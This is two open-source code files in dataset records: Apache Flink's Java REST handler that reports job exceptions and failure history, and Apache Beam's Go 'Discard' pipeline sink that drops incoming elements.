import org.apache.flink.util.Preconditions;
import org.apache.flink.shaded.curator5.com.google.common.collect.Iterables;
import javax.annotation.Nullable;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.Executor;
import java.util.stream.Collectors;
import java.util.stream.StreamSupport;
/** Handler serving the job exceptions. */
public class JobExceptionsHandler
        extends AbstractExecutionGraphHandler<
                JobExceptionsInfoWithHistory, JobExceptionsMessageParameters>
        implements JsonArchivist {

    /** Default cap on the number of exceptions included in a response. */
    static final int MAX_NUMBER_EXCEPTION_TO_REPORT = 20;

    public JobExceptionsHandler(
            GatewayRetriever<? extends RestfulGateway> leaderRetriever,
            Time timeout,
            Map<String, String> responseHeaders,
            MessageHeaders<
                            EmptyRequestBody,
                            JobExceptionsInfoWithHistory,
                            JobExceptionsMessageParameters>
                    messageHeaders,
            ExecutionGraphCache executionGraphCache,
            Executor executor) {
        super(
                leaderRetriever,
                timeout,
                responseHeaders,
                messageHeaders,
                executionGraphCache,
                executor);
    }

    @Override
    protected JobExceptionsInfoWithHistory handleRequest(
            HandlerRequest<EmptyRequestBody> request, ExecutionGraphInfo executionGraph) {
        // An explicit upper limit from the query string overrides the built-in default.
        final List<Integer> requestedLimits =
                request.getQueryParameter(UpperLimitExceptionParameter.class);
        final int maxExceptions;
        if (requestedLimits.isEmpty()) {
            maxExceptions = MAX_NUMBER_EXCEPTION_TO_REPORT;
        } else {
            maxExceptions = requestedLimits.get(0);
        }
        return createJobExceptionsInfo(executionGraph, maxExceptions);
    }

    @Override
    public Collection<ArchivedJson> archiveJsonWithPath(ExecutionGraphInfo executionGraphInfo)
            throws IOException {
        final ResponseBody body =
                createJobExceptionsInfo(executionGraphInfo, MAX_NUMBER_EXCEPTION_TO_REPORT);
        // Substitute the job id for the ":jobid" placeholder of the endpoint URL template.
        final String archivePath =
                getMessageHeaders()
                        .getTargetRestEndpointURL()
                        .replace(
                                ':' + JobIDPathParameter.KEY,
                                executionGraphInfo.getJobId().toString());
        return Collections.singletonList(new ArchivedJson(archivePath, body));
    }

    private static JobExceptionsInfoWithHistory createJobExceptionsInfo(
            ExecutionGraphInfo executionGraphInfo, int exceptionToReportMaxSize) {
        final ArchivedExecutionGraph graph = executionGraphInfo.getArchivedExecutionGraph();
        final ErrorInfo rootFailure = graph.getFailureInfo();
        if (rootFailure == null) {
            // No root failure recorded: only the exception history is exposed.
            return new JobExceptionsInfoWithHistory(
                    createJobExceptionHistory(
                            executionGraphInfo.getExceptionHistory(), exceptionToReportMaxSize));
        }

        // Collect per-task failures (deprecated fields) up to the requested cap.
        final List<JobExceptionsInfo.ExecutionExceptionInfo> taskExceptions = new ArrayList<>();
        boolean truncated = false;
        for (AccessExecutionVertex vertex : graph.getAllExecutionVertices()) {
            final Optional<ErrorInfo> vertexFailure = vertex.getFailureInfo();
            if (!vertexFailure.isPresent()) {
                continue;
            }
            if (taskExceptions.size() >= exceptionToReportMaxSize) {
                // Another failed task exists beyond the cap, so the listing is incomplete.
                truncated = true;
                break;
            }
            final long failedAt = vertex.getStateTimestamp(ExecutionState.FAILED);
            taskExceptions.add(
                    new JobExceptionsInfo.ExecutionExceptionInfo(
                            vertexFailure.get().getExceptionAsString(),
                            vertex.getTaskNameWithSubtaskIndex(),
                            toString(vertex.getCurrentAssignedResourceLocation()),
                            failedAt == 0 ? -1 : failedAt));
        }

        return new JobExceptionsInfoWithHistory(
                rootFailure.getExceptionAsString(),
                rootFailure.getTimestamp(),
                taskExceptions,
                truncated,
                createJobExceptionHistory(
                        executionGraphInfo.getExceptionHistory(), exceptionToReportMaxSize));
    }

    private static JobExceptionsInfoWithHistory.JobExceptionHistory createJobExceptionHistory(
            Iterable<RootExceptionHistoryEntry> historyEntries, int limit) {
        // we need to reverse the history to have a stable result when doing paging on it
        final List<RootExceptionHistoryEntry> newestFirst = new ArrayList<>();
        Iterables.addAll(newestFirst, historyEntries);
        Collections.reverse(newestFirst);

        final List<JobExceptionsInfoWithHistory.RootExceptionInfo> visibleEntries =
                newestFirst.stream()
                        .limit(limit)
                        .map(JobExceptionsHandler::createRootExceptionInfo)
                        .collect(Collectors.toList());

        return new JobExceptionsInfoWithHistory.JobExceptionHistory(
                visibleEntries, visibleEntries.size() < newestFirst.size());
    }

    private static JobExceptionsInfoWithHistory.RootExceptionInfo createRootExceptionInfo(
            RootExceptionHistoryEntry historyEntry) {
        final List<JobExceptionsInfoWithHistory.ExceptionInfo> concurrentExceptions =
                new ArrayList<>();
        for (ExceptionHistoryEntry concurrent : historyEntry.getConcurrentExceptions()) {
            concurrentExceptions.add(createExceptionInfo(concurrent));
        }

        if (!historyEntry.isGlobal()) {
            // Local failures additionally carry the failing task's name and location.
            assertLocalExceptionInfo(historyEntry);
            return new JobExceptionsInfoWithHistory.RootExceptionInfo(
                    historyEntry.getException().getOriginalErrorClassName(),
                    historyEntry.getExceptionAsString(),
                    historyEntry.getTimestamp(),
                    historyEntry.getFailingTaskName(),
                    toString(historyEntry.getTaskManagerLocation()),
                    concurrentExceptions);
        }

        return new JobExceptionsInfoWithHistory.RootExceptionInfo(
                historyEntry.getException().getOriginalErrorClassName(),
                historyEntry.getExceptionAsString(),
                historyEntry.getTimestamp(),
                concurrentExceptions);
    }

    private static JobExceptionsInfoWithHistory.ExceptionInfo createExceptionInfo(
            ExceptionHistoryEntry entry) {
        assertLocalExceptionInfo(entry);
        return new JobExceptionsInfoWithHistory.ExceptionInfo(
                entry.getException().getOriginalErrorClassName(),
                entry.getExceptionAsString(),
                entry.getTimestamp(),
                entry.getFailingTaskName(),
                toString(entry.getTaskManagerLocation()));
    }

    private static void assertLocalExceptionInfo(ExceptionHistoryEntry entry) {
        Preconditions.checkArgument(
                entry.getFailingTaskName() != null,
                "The taskName must not be null for a non-global failure.");
    }

    @VisibleForTesting
    static String toString(@Nullable TaskManagerLocation location) {
        // '(unassigned)' being the default value is added to support backward-compatibility for the
        // deprecated fields
        if (location == null) {
            return "(unassigned)";
        }
        return taskManagerLocationToString(location.getFQDNHostname(), location.dataPort());
    }

    @VisibleForTesting
    @Nullable
    static String toString(@Nullable ExceptionHistoryEntry.ArchivedTaskManagerLocation location) {
        if (location == null) {
            return null;
        }
        return taskManagerLocationToString(location.getFQDNHostname(), location.getPort());
    }

    private static String taskManagerLocationToString(String host, int port) {
        return String.format("%s:%d", host, port);
    }
}
| apache/flink | flink-runtime/src/main/java/org/apache/flink/runtime/rest/handler/job/JobExceptionsHandler.java | Java | apache-2.0 | 11,142 |
// Licensed to the Apache Software Foundation (ASF) under one or more
// contributor license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright ownership.
// The ASF licenses this file to You under the Apache License, Version 2.0
// (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package exec
import "context"
// Discard silently discards all elements it receives. It is implicitly
// inserted for any loose ends in the pipeline.
type Discard struct {
	// UID is the unit identifier.
	UID UnitID
}

// ID returns the unit identifier.
func (n *Discard) ID() UnitID {
	return n.UID
}

// Up is a no-op: a discard sink needs no setup.
func (n *Discard) Up(ctx context.Context) error {
	return nil
}

// StartBundle is a no-op: there is no per-bundle state to prepare.
func (n *Discard) StartBundle(ctx context.Context, id string, data DataContext) error {
	return nil
}

// ProcessElement drops the element and always succeeds.
func (n *Discard) ProcessElement(ctx context.Context, value FullValue, values ...ReStream) error {
	return nil
}

// FinishBundle is a no-op: nothing was buffered.
func (n *Discard) FinishBundle(ctx context.Context) error {
	return nil
}

// Down is a no-op: there are no resources to release.
func (n *Discard) Down(ctx context.Context) error {
	return nil
}

// String returns a short human-readable name for diagnostics.
func (n *Discard) String() string {
	return "Discard"
}
| rangadi/beam | sdks/go/pkg/beam/core/runtime/exec/discard.go | GO | apache-2.0 | 1,532 |